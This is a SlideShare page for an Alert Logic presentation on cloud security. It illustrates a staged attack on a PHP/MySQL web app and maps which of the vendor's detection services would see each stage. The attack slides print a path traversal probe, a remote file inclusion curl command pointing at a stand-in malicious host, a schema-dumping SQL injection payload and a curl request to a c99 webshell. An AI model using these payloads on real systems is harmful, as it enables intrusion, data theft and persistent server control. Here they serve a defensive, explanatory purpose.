SlideShare una empresa de Scribd logo

Realities of Security in the Cloud

Alert Logic
Alert Logic

The document discusses security challenges in cloud computing and provides an overview of Alert Logic's security solutions. It begins by noting that security is a challenge that has changed with the cloud model introducing shared responsibility. It then provides examples of security services Alert Logic offers across various areas like access management, patching, monitoring, and network threat detection. The document uses an example attack scenario to illustrate how an attacker may perform reconnaissance, exploit vulnerabilities like path traversal and remote file inclusion, extract data through SQL injection, establish command and control through a webshell, and the visibility different parts of Alert Logic's solution would provide at each stage. It argues integrated solutions covering assets, vulnerabilities, network, and application layers are needed for full threat visibility and coverage.

Tecnología
1 de 20
Descargar para leer sin conexión
REALITIES OF SECURITY IN THE CLOUD
Security is a challenge.
Security Has Changed
Security in the Cloud is a Shared Responsibility PROVIDES • Secure coding and best practices • Software and virtual patching • Configuration management • Access management • Application level attack monitoring • Access management • Patch management • Configuration hardening • Security monitoring • Log analysis • Network threat detection • Security monitoring • Logical network segmentation • Perimeter security services • External DDoS, spoofing, and scanning prevented • Hardened hypervisor • System image library • Root access for customer • Configuration best practices
Let’s talk about security coverage.
Tame the Beast Industry Challenge: The Good, the Bad and the Ugly Known Good Known Bad Suspicious Allow Identify | Tune | Permit Block Drop | Reconfigure Application Stack Web Apps Server-side Apps App Frameworks Dev Platforms Databases Server OS Hypervisor Hardware Classification Action HUMAN EXPERT REQUIRED
Classic 3-Tier Web Application Key Target Assets Key target assets for attack Across the Full Stack 1. Custom application 2. Web server implementation Apache, IIS, NGINGX 3. Application server implementation Tomcat, Jboss, Jetty, ASP 4. Web server frameworks and languages Struts, PHP, Java 5. Databases mySql, Oracle, MSSQL,.. 6. AWS services IAM, EC2, S3 EC2 instances EC2 instances VPC Route 53 Users Internet gateway ELB DB instance DB instance AvailabilityzoneAAvailabilityzoneB Auto scaling group Web App Server Auto scaling group S3 EC2 instances EC2 instances
An attack scenario - Recon VPC Route 53 Internet gateway ELB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB S3 Bastion Host PHP Application On Linux 1 – Performs low-frequency app-scan 2 – Tests path traversal and enumerates directories 3 – Tests remote file inclusion Recon Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=.. /../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site- import/admin/page.php> Attacker learnings: vulnerable PHP/mySql app, prone to both smash’n grab attacks as more persistent attack approaches
Entry and data exfiltration • Attacker launches a series of SQL-I injection discovery attempts • Gets a dump-in-one-shot attack and gets full table return http://victim.com/report.php?id=23 and(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a) Attacker achievements: obtained sensitive customer-data without need for local process or system breaches on servers An attack scenario – opportunistic exfiltration VPC Route 53 Internet gateway ELB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB S3 Bastion Host PHP Application On Linux 4 - SQL-I data extraction attack Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=../../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site-import/admin/page.php> Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks as more persistent attack approaches Entry/Exfil
VPC Route 53 Internet gateway ELB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB S3 Bastion Host PHP Application On Linux 5 - Webshell injection 6 - Commanding through Shell Command and control (C&C) • Attacker uploads c99 webshell via RFI vulnerability • Persistent foothold for lateral movement established curl -X POST -F 'act=search' -F 'grep=' -F 'fullhexdump=' -F 'base64=' -F 'nixpasswd=' -F 'pid=' -F 'c=' -F 'white=' -F 'sig=' -F 'processes_sort=' -F 'd=/var/www/' -F 'sort=' -F 'f=' -F 'ft=' http [://] mysite [dot] com/path/to/c99 Attacker achievements: obtained foothold for further action and lateral movement Entry and data exfiltration • Attacker launches a series of SQL-I injection attempts • Gets a dump-in-one-shot attack and gets full table return Attacker achievements: obtained sensitive customer-data without need for local process or system breaches on servers Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=../../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability (RFI) Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks as more persistent attack approaches An attack scenario – persistent foothold Command and control
Deep Application threat visibility Network inspection Expert SOC Analysis of Findings Network, system, application infrastructure threat visibility Alert Logic’s Approach Cloudtrail Config&VulnAssessment Foundation Asset and exposure visibility Log Collection HTTP Inspection Expert Curation, R&D of Content and Intel Analytics and Machine Learning Content and Intel Application level Web Attacks OWASP Top 10 Attacks against vulnerable platforms and libraries Attacks against miscon- figurations
Coverage needed for this scenario Low slow scan Path traver sal RFI SQLi Web shell Recon Entry Exfil C&C Cloudtrail Overall combined coverage scorecard No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage How much can we see?
Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Recon Entry Exfil C&C Cloudtrail Config&VulnAssessment Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
Network, system, application infrastructure threat visibility Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Network inspection providers visibility on attacker actions on the known vulnerabilities exploited in the attack and their success Recon Entry Exfil C&C Network inspection Cloudtrail Config&VulnAssessment Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
Deep Application threat visibility Network, system, application infrastructure threat visibility Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Network inspection providers visibility on attacker actions on the known vulnerabilities exploited in the attack and their success Deep HTTP inspection on requests and responses, learning and anomaly detection deepens coverage for whole classes of application attacks Recon Entry Exfil C&C Network inspection Cloudtrail Config&VulnAssessment Log Collection HTTP Inspection Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
SECURITY EXPERTS Integrated Security Model Incident Investigation System Visual | Context | Hunt Data & Event Sources Assets | Config | Logs Automatic Detection Block | Alert | Log ML Algorithms Rules & Analytics Security Researchers Data Scientists Software Programmers Integrated: Infrastructure | Content | Human Experts Security Analysts
We designed security for cloud and hybrid environments GET STARTED IN MINUTES MAINTAIN COVERAGE AT CLOUD SCALE KEEP PRODUCTION FLOWING with modular services that grow with you Comply with integration to cloud APIs and DevOps automation with auto-scaling support and out-of-band detection Single pane of glass for workload and application security across cloud, hosted & on-premises
Leaders 28 8 6 4 10 25 3 5 5 11 8 10 15 24 Other Amazon Check Point Chronicle Data Cisco Fortinet Intel Security Okta Symantec Barricade JumpCloud Evident.io Palerra Microsoft CloudPassage CloudCheckr FortyCloud ThreatStack Alert Logic A recognized security leader “Alert Logic has a head start in the cloud, and it shows.” PETER STEPHENSON SC Magazine review “…the depth and breadth of the offering’s analytics and threat management process goes beyond anything we’ve seen…”Who is your primary in-use vendor for Cloud Infrastructure Security? Who are the top vendors in consideration for Cloud Infrastructure Security? Alert Logic
Over 4,000 worldwide customers AUTOMOTIVE HEALTHCARE EDUCATION FINANCIAL SERVICES MANUFACTURING MEDIA/PUBLISHING RETAIL/E-COMMERCE ENERGY & CHEMICALS TECHNOLOGY & SERVICES GOV’T / NON-PROFIT
Thank You.

Recomendados

Realities of Security in the Cloud - CSS ATX 2017
Realities of Security in the Cloud - CSS ATX 2017Realities of Security in the Cloud - CSS ATX 2017
Realities of Security in the Cloud - CSS ATX 2017Alert Logic
 
Stories from the Security Operations Center (S.O.C.)
Stories from the Security Operations Center (S.O.C.)Stories from the Security Operations Center (S.O.C.)
Stories from the Security Operations Center (S.O.C.)Alert Logic
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the CloudAlert Logic
 
Security Implications of the Cloud - CSS Dallas Azure
Security Implications of the Cloud - CSS Dallas AzureSecurity Implications of the Cloud - CSS Dallas Azure
Security Implications of the Cloud - CSS Dallas AzureAlert Logic
 
Stories from the Security Operations Center
Stories from the Security Operations CenterStories from the Security Operations Center
Stories from the Security Operations CenterAlert Logic
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the CloudAlert Logic
 
Security Implications of the Cloud - CSS ATX 2017
Security Implications of the Cloud - CSS ATX 2017Security Implications of the Cloud - CSS ATX 2017
Security Implications of the Cloud - CSS ATX 2017Alert Logic
 
Reality Check: Security in the Cloud
Reality Check: Security in the CloudReality Check: Security in the Cloud
Reality Check: Security in the CloudAlert Logic
 

Recomendados

Realities of Security in the Cloud - CSS ATX 2017
Realities of Security in the Cloud - CSS ATX 2017Realities of Security in the Cloud - CSS ATX 2017
Realities of Security in the Cloud - CSS ATX 2017Alert Logic
 
Stories from the Security Operations Center (S.O.C.)
Stories from the Security Operations Center (S.O.C.)Stories from the Security Operations Center (S.O.C.)
Stories from the Security Operations Center (S.O.C.)Alert Logic
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the CloudAlert Logic
 
Security Implications of the Cloud - CSS Dallas Azure
Security Implications of the Cloud - CSS Dallas AzureSecurity Implications of the Cloud - CSS Dallas Azure
Security Implications of the Cloud - CSS Dallas AzureAlert Logic
 
Stories from the Security Operations Center
Stories from the Security Operations CenterStories from the Security Operations Center
Stories from the Security Operations CenterAlert Logic
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the CloudAlert Logic
 
Security Implications of the Cloud - CSS ATX 2017
Security Implications of the Cloud - CSS ATX 2017Security Implications of the Cloud - CSS ATX 2017
Security Implications of the Cloud - CSS ATX 2017Alert Logic
 
Reality Check: Security in the Cloud
Reality Check: Security in the CloudReality Check: Security in the Cloud
Reality Check: Security in the CloudAlert Logic
 
Protecting Against Web Attacks
Protecting Against Web AttacksProtecting Against Web Attacks
Protecting Against Web AttacksAlert Logic
 
Reducing Your Attack Surface
Reducing Your Attack SurfaceReducing Your Attack Surface
Reducing Your Attack SurfaceAlert Logic
 
CSS 17: NYC - Stories from the SOC
CSS 17: NYC - Stories from the SOCCSS 17: NYC - Stories from the SOC
CSS 17: NYC - Stories from the SOCAlert Logic
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOpsAlert Logic
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the CloudAlert Logic
 
Protecting Against Web App Attacks
Protecting Against Web App AttacksProtecting Against Web App Attacks
Protecting Against Web App AttacksAlert Logic
 
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionReducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionAlert Logic
 
CSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the CloudCSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the CloudAlert Logic
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOpsAlert Logic
 
#ALSummit: Live Cyber Hack Demonstration
#ALSummit: Live Cyber Hack Demonstration#ALSummit: Live Cyber Hack Demonstration
#ALSummit: Live Cyber Hack DemonstrationAlert Logic
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the CloudAlert Logic
 
CSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsCSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsAlert Logic
 
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_alCss sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_alAlert Logic
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeAlert Logic
 
#ALSummit: Cyber Resiliency: Surviving the Breach
#ALSummit: Cyber Resiliency: Surviving the Breach#ALSummit: Cyber Resiliency: Surviving the Breach
#ALSummit: Cyber Resiliency: Surviving the BreachAlert Logic
 
CSS17: Houston - Stories from the Security Operations Center
CSS17: Houston - Stories from the Security Operations CenterCSS17: Houston - Stories from the Security Operations Center
CSS17: Houston - Stories from the Security Operations CenterAlert Logic
 
#ALSummit: Architecting Security into your AWS Environment
#ALSummit: Architecting Security into your AWS Environment#ALSummit: Architecting Security into your AWS Environment
#ALSummit: Architecting Security into your AWS EnvironmentAlert Logic
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
 
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_alCss sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_alAlert Logic
 
CSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web AppsCSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web AppsAlert Logic
 
Altitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeAltitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeFastly
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxkarthikvcyber
 

Más contenido relacionado

La actualidad más candente

Protecting Against Web Attacks
Protecting Against Web AttacksProtecting Against Web Attacks
Protecting Against Web AttacksAlert Logic
 
Reducing Your Attack Surface
Reducing Your Attack SurfaceReducing Your Attack Surface
Reducing Your Attack SurfaceAlert Logic
 
CSS 17: NYC - Stories from the SOC
CSS 17: NYC - Stories from the SOCCSS 17: NYC - Stories from the SOC
CSS 17: NYC - Stories from the SOCAlert Logic
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOpsAlert Logic
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the CloudAlert Logic
 
Protecting Against Web App Attacks
Protecting Against Web App AttacksProtecting Against Web App Attacks
Protecting Against Web App AttacksAlert Logic
 
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionReducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionAlert Logic
 
CSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the CloudCSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the CloudAlert Logic
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOpsAlert Logic
 
#ALSummit: Live Cyber Hack Demonstration
#ALSummit: Live Cyber Hack Demonstration#ALSummit: Live Cyber Hack Demonstration
#ALSummit: Live Cyber Hack DemonstrationAlert Logic
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the CloudAlert Logic
 
CSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsCSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsAlert Logic
 
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_alCss sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_alAlert Logic
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeAlert Logic
 
#ALSummit: Cyber Resiliency: Surviving the Breach
#ALSummit: Cyber Resiliency: Surviving the Breach#ALSummit: Cyber Resiliency: Surviving the Breach
#ALSummit: Cyber Resiliency: Surviving the BreachAlert Logic
 
CSS17: Houston - Stories from the Security Operations Center
CSS17: Houston - Stories from the Security Operations CenterCSS17: Houston - Stories from the Security Operations Center
CSS17: Houston - Stories from the Security Operations CenterAlert Logic
 
#ALSummit: Architecting Security into your AWS Environment
#ALSummit: Architecting Security into your AWS Environment#ALSummit: Architecting Security into your AWS Environment
#ALSummit: Architecting Security into your AWS EnvironmentAlert Logic
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
 
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_alCss sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_alAlert Logic
 
CSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web AppsCSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web AppsAlert Logic
 

La actualidad más candente (20)

Protecting Against Web Attacks
Protecting Against Web AttacksProtecting Against Web Attacks
Protecting Against Web Attacks
 
Reducing Your Attack Surface
Reducing Your Attack SurfaceReducing Your Attack Surface
Reducing Your Attack Surface
 
CSS 17: NYC - Stories from the SOC
CSS 17: NYC - Stories from the SOCCSS 17: NYC - Stories from the SOC
CSS 17: NYC - Stories from the SOC
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOps
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the Cloud
 
Protecting Against Web App Attacks
Protecting Against Web App AttacksProtecting Against Web App Attacks
Protecting Against Web App Attacks
 
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionReducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
 
CSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the CloudCSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the Cloud
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOps
 
#ALSummit: Live Cyber Hack Demonstration
#ALSummit: Live Cyber Hack Demonstration#ALSummit: Live Cyber Hack Demonstration
#ALSummit: Live Cyber Hack Demonstration
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the Cloud
 
CSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsCSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web Applications
 
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_alCss sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
Css sf azure_8-9-17-stories_from_the_soc_paul fletcher_al
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in Practice
 
#ALSummit: Cyber Resiliency: Surviving the Breach
#ALSummit: Cyber Resiliency: Surviving the Breach#ALSummit: Cyber Resiliency: Surviving the Breach
#ALSummit: Cyber Resiliency: Surviving the Breach
 
CSS17: Houston - Stories from the Security Operations Center
CSS17: Houston - Stories from the Security Operations CenterCSS17: Houston - Stories from the Security Operations Center
CSS17: Houston - Stories from the Security Operations Center
 
#ALSummit: Architecting Security into your AWS Environment
#ALSummit: Architecting Security into your AWS Environment#ALSummit: Architecting Security into your AWS Environment
#ALSummit: Architecting Security into your AWS Environment
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
 
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_alCss sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
 
CSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web AppsCSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web Apps
 

Similar a Realities of Security in the Cloud

Altitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeAltitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeFastly
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxkarthikvcyber
 
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & ComplianceCortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & ComplianceMSAdvAnalytics
 
CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself Alert Logic
 
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentation
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentationOwasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentation
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentationDerrick Hunter
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessmentRavikumar Paghdal
 
Presentation for information security & hacking
Presentation for information security & hackingPresentation for information security & hacking
Presentation for information security & hackingfaizanmalik255119
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombPriyanka Aash
 
Managed Threat Detection & Response for AWS Applications
Managed Threat Detection & Response for AWS ApplicationsManaged Threat Detection & Response for AWS Applications
Managed Threat Detection & Response for AWS ApplicationsAlert Logic
 
Port of seattle security presentation david morris
Port of seattle security presentation david morrisPort of seattle security presentation david morris
Port of seattle security presentation david morrisEmily2014
 
Offensive cyber security engineer pragram course agenda
Offensive cyber security engineer pragram course agendaOffensive cyber security engineer pragram course agenda
Offensive cyber security engineer pragram course agendaShivamSharma909
 
Offensive cyber security engineer
Offensive cyber security engineerOffensive cyber security engineer
Offensive cyber security engineerShivamSharma909
 
Offensive cyber security engineer updated
Offensive cyber security engineer updatedOffensive cyber security engineer updated
Offensive cyber security engineer updatedInfosecTrain
 
Exploitation techniques and fuzzing
Exploitation techniques and fuzzingExploitation techniques and fuzzing
Exploitation techniques and fuzzingG Prachi
 
Managed Threat Detection and Response
Managed Threat Detection and ResponseManaged Threat Detection and Response
Managed Threat Detection and ResponseAlert Logic
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?Tomasz Jakubowski
 

Similar a Realities of Security in the Cloud (20)

Altitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edgeAltitude SF 2017: Security at the edge
Altitude SF 2017: Security at the edge
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
 
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & ComplianceCortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
Cortana Analytics Workshop: Cortana Analytics -- Security, Privacy & Compliance
 
CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself
 
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentation
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentationOwasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentation
Owasp A9 USING KNOWN VULNERABLE COMPONENTS IT 6873 presentation
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessment
 
Presentation for information security & hacking
Presentation for information security & hackingPresentation for information security & hacking
Presentation for information security & hacking
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Managed Threat Detection & Response for AWS Applications
Managed Threat Detection & Response for AWS ApplicationsManaged Threat Detection & Response for AWS Applications
Managed Threat Detection & Response for AWS Applications
 
Attques web
Attques webAttques web
Attques web
 
Port of seattle security presentation david morris
Port of seattle security presentation david morrisPort of seattle security presentation david morris
Port of seattle security presentation david morris
 
Offensive cyber security engineer pragram course agenda
Offensive cyber security engineer pragram course agendaOffensive cyber security engineer pragram course agenda
Offensive cyber security engineer pragram course agenda
 
Offensive cyber security engineer
Offensive cyber security engineerOffensive cyber security engineer
Offensive cyber security engineer
 
Offensive cyber security engineer updated
Offensive cyber security engineer updatedOffensive cyber security engineer updated
Offensive cyber security engineer updated
 
Exploitation techniques and fuzzing
Exploitation techniques and fuzzingExploitation techniques and fuzzing
Exploitation techniques and fuzzing
 
Managed Threat Detection and Response
Managed Threat Detection and ResponseManaged Threat Detection and Response
Managed Threat Detection and Response
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 
Security testing
Security testingSecurity testing
Security testing
 
Web Security
Web SecurityWeb Security
Web Security
 

Más de Alert Logic

Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Alert Logic
 
Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Extending Amazon GuardDuty with Cloud Insight Essentials
Extending Amazon GuardDuty with Cloud Insight Essentials Alert Logic
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeAlert Logic
 
Security Spotlight: Presidio
Security Spotlight: PresidioSecurity Spotlight: Presidio
Security Spotlight: PresidioAlert Logic
 
Security Spotlight: Rent-A-Center
Security Spotlight: Rent-A-CenterSecurity Spotlight: Rent-A-Center
Security Spotlight: Rent-A-CenterAlert Logic
 
The Intersection of Security & DevOps
The Intersection of Security & DevOpsThe Intersection of Security & DevOps
The Intersection of Security & DevOpsAlert Logic
 
Security Spotlight: Presidio
Security Spotlight: PresidioSecurity Spotlight: Presidio
Security Spotlight: PresidioAlert Logic
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the CloudAlert Logic
 
Reducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionReducing Your Attack Surface & Your Role in Cloud Workload Protection
Reducing Your Attack Surface & Your Role in Cloud Workload ProtectionAlert Logic
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the CloudAlert Logic
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeAlert Logic
 
Realities of Security in the Cloud
Realities of Security in the CloudRealities of Security in the Cloud
Realities of Security in the CloudAlert Logic
 
The Intersection of Security and DevOps
The Intersection of Security and DevOpsThe Intersection of Security and DevOps
The Intersection of Security and DevOpsAlert Logic
 
Security Spotlight: The Coca Cola Company
Security Spotlight: The Coca Cola CompanySecurity Spotlight: The Coca Cola Company
Security Spotlight: The Coca Cola CompanyAlert Logic
 
Reducing Your Attack Surface and Yuor Role in Cloud Workload Protection
Reducing Your Attack Surface and Yuor Role in Cloud Workload ProtectionReducing Your Attack Surface and Yuor Role in Cloud Workload Protection
Reducing Your Attack Surface and Yuor Role in Cloud Workload ProtectionAlert Logic
 
The AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeThe AWS Shared Responsibility Model in Practice
The AWS Shared Responsibility Model in PracticeAlert Logic
 
Security Implications of the Cloud
Security Implications of the CloudSecurity Implications of the Cloud
Security Implications of the CloudAlert Logic
 
Microsoft Azure Security Overview - Microsoft - CSS Dallas Azure
